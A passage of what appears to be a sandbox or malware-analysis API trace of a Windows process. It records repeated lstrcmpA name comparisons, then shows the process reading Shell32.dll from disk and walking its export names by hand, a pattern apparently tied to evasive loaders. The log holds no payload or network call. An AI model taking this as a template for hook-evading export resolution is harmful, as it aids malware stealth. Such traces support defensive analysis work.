(lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0190.368] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0190.369] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.369] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0190.370] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0194.528] GetProcessHeap () returned 0x4a0000 [0194.528] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4116040 | out: hHeap=0x4a0000) returned 1 [0194.538] GetProcessHeap () returned 0x4a0000 [0194.538] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b91c0 [0194.538] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0194.539] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0194.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0194.540] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0194.540] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0194.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0194.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0194.540] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0194.541] GetProcessHeap () returned 0x4a0000 [0194.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1587258) returned 0x4118040 [0194.835] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0194.835] ReadFile (in: hFile=0x140, lpBuffer=0x4118040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4118040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0207.031] CloseHandle (hObject=0x140) returned 1 [0207.032] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0207.033] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0207.033] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0207.033] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0207.033] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0207.033] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0207.034] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0207.034] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0207.034] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.034] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0207.034] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0207.034] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0207.034] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.034] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0207.034] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0207.034] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0207.034] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0207.034] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.035] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0207.035] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.035] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.035] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0207.035] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0207.035] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0207.036] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0207.036] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.037] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.038] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0207.038] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0207.038] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0207.039] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0207.040] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.041] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.042] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0207.043] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.044] lstrcmpA 